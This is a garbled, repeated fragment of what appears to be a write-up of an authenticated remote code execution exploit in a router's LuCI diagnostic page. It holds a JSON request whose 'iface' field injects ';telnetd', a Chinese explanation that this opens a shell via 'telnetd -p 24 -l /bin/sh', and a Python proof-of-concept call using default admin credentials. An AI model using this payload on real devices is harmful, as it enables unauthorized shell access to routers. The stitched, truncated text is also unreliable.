ipaddr_ping": "baidu.com",
"iface_ping": "WAN1",
"ipaddr": "baidu.com",
"iface": ";telnetd...ipaddr_ping": "baidu.com",
"iface_ping": "WAN1",
"ipaddr": "baidu.com",
"iface": ";telnetd...\r\n"
}
}
在Web认证登录后,发送构造好的恶意Payload,执行命令telnetd -p 24 -l /bin/sh,就会打开路由器的telnet功能。...LUCI diagnostic Authenticated RCE-----------'
print execute('192.168.1.1', 80, 'admin', 'admin', 'telnetd...LUCI diagnostic Authenticated RCE-----------'
print execute('192.168.1.1', 80, 'admin', 'admin', 'telnetd